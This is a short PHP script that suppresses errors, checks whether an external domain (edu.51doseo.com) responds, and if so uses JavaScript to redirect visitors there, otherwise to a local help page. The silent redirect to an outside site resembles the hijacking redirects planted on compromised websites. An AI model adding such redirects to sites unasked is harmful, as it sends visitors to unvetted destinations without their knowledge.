<?php
error_reporting(0);
$url="http://edu.51doseo.com";
$fl=file_get_contents($url);
if($fl)
echo "<script>window.location.href='http://edu.51doseo.com';</script>";
else
echo "<script>window.location.href='../help.html';</script>";
?>
